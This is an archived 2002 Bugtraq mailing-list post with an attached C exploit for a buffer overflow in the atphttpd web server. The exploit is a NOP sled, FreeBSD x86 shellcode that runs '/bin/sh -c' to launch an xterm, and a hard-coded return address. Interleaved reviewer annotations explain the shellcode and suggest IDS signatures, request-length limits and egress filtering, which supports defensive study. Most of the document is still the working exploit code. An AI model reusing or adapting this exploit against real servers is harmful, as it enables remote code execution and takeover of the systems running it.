[26167] in bugtraq


Re: Multiple vulnerabilities in atphttpd-0.4b

daemon@ATHENA.MIT.EDU (badc0ded@badc0ded.com)
Sun Jul 14 23:28:25 2002

Message-ID: <000c01c221a3$49fc1bc0$0892c6c3@rtwts0anprggri>
From: <badc0ded@badc0ded.com>
To: <bugtraq@securityfocus.com>
Date: Tue, 2 Jul 2002 01:34:30 -0700
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0009_01C22168.9C8BACB0"

------=_NextPart_000_0009_01C22168.9C8BACB0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Attached is an exploit for the atphttpd vuln. 


YES! I'm really bored....



------=_NextPart_000_0009_01C22168.9C8BACB0
Content-Type: application/octet-stream;
	name="atp-exploit.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="atp-exploit.c"

/* atphttpd exploit.
 / The exploit sucks, if you get it wrong the first time the server just =
dies
 / so I didnt bother adding any offset argument to the exploit. Also if =
you=20
 / change the IP addy you may have to change the alignment a little.  =20
 /
 / http://www.badc0ded.com=20
*/

/*
 * Reviewer annotations (defensive reading of the listing).
 *
 * The attachment is reproduced as archived, still in quoted-printable
 * transfer encoding (see the Content-Transfer-Encoding header above):
 * "=3D", "=20", "=09" and a trailing "=" are encoding artifacts, not C.
 *
 * ret: four raw bytes that main() prints repeatedly after the payload.
 * The value is hard-coded, so it only fits one memory layout; the author's
 * header comment confirms that a wrong guess makes the server die.
 * NOTE(review): presumably a stack address on the author's FreeBSD/x86
 * host -- confirm against the advisory. A fixed address like this is what
 * address-space randomisation and a non-executable stack are meant to
 * defeat, and an unexplained daemon crash after an oversized request is
 * worth treating as a sign of a failed attempt.
 */
#define ret "\x78\xf5\xbf\xbf"
/*
 * FreeBSD[]: machine-code bytes followed by an ASCII command string.
 * Going by the per-line disassembly comments, the code uses a jmp/call/pop
 * pair to find the address of the trailing string, builds an argument
 * vector for "/bin//sh -c <string>" on the stack and traps into the kernel
 * with int $0x80. The string asks for an xterm on an X display at the
 * address embedded in it.
 *
 * Detection and mitigation notes:
 *  - the literals "/bin", "//sh" and "-c" appear in clear text inside the
 *    request, next to a long run of 0x90 bytes (see main);
 *  - the command opens an outbound X11 session, so egress filtering of X11
 *    from server hosts limits the impact even where the overflow is
 *    unpatched.
 *
 * The archived comment on the "\xb0\x3b" line read "$0x0b", which does not
 * match the byte; it is corrected to $0x3b below (59, execve in FreeBSD's
 * syscall table).
 */
char FreeBSD[]=3D		 /* stolen lsd-pl.net shellcode	   */  =09
  "\xeb\x25"             /* jmp     <cmdshellcode+39>      */
  "\x59"                 /* popl    %ecx                   */
  "\x31\xc0"             /* xorl    %eax,%eax              */
  "\x50"                 /* pushl   %eax                   */
  "\x68""//sh"           /* pushl   $0x68732f2f            */
  "\x68""/bin"           /* pushl   $0x6e69622f            */
  "\x89\xe3"             /* movl    %esp,%ebx              */
  "\x50"                 /* pushl   %eax                   */
  "\x66\x68""-c"         /* pushw   $0x632d                */
  "\x89\xe7"             /* movl    %esp,%edi              */
  "\x50"                 /* pushl   %eax                   */
  "\x51"                 /* pushl   %ecx                   */
  "\x57"                 /* pushl   %edi                   */
  "\x53"                 /* pushl   %ebx                   */
  "\x89\xe7"             /* movl    %esp,%edi              */
  "\x50"                 /* pushl   %eax                   */
  "\x57"                 /* pushl   %edi                   */
  "\x53"                 /* pushl   %ebx                   */
  "\x50"                 /* pushl   %eax                   */
  "\xb0\x3b"             /* movb    $0x3b,%al  (0x3b = 59) */
  "\xcd\x80"             /* int     $0x80                  */=20
  "\xe8\xd6\xff\xff\xff" /* call    <cmdshellcode+2>       */
  "/usr/X11R6/bin/xterm -display 127.0.0.1:0;";

/*
 * Writes the crafted input to stdout and does nothing else: no socket is
 * opened anywhere in this file, so delivery is left to whatever consumes
 * the output.
 *
 * Output layout, in order: a run of 0x90 filler bytes, the FreeBSD[]
 * string, the four-byte ret value repeated, then two newlines. In total it
 * is on the order of a kilobyte on a single line.
 *
 * Reviewer notes (defensive):
 *  - A request line of this size, opening with hundreds of identical 0x90
 *    bytes and closing with one four-byte word repeated about a hundred
 *    times, is easy to match in an IDS rule or to reject with a
 *    request-length limit in front of the server.
 *  - The vulnerable atphttpd code is not shown on this page. The lasting
 *    fix belongs there (bounds-checking the buffer that receives the
 *    request), not in filtering alone.
 */
main ()
{
  int i;
  /* Filler: 502 bytes of 0x90, since i runs from 0 to 501 inclusive. */
  for (i=3D0;i<=3D501;i++) // this would be a good place to change =
alignment
    printf("\x90");
  /* The payload array, printed as a C string (it holds no NUL byte before its end). */
  printf("%s",FreeBSD);
  /* ret printed 101 times, since i runs from 0 to 100 inclusive. */
  for (i=3D0;i<=3D100;i++)=20
    printf("%s",ret);
  /* Two newlines close the output; presumably they end the HTTP request -- confirm against the advisory. */
  printf("\n\n");
}

------=_NextPart_000_0009_01C22168.9C8BACB0--

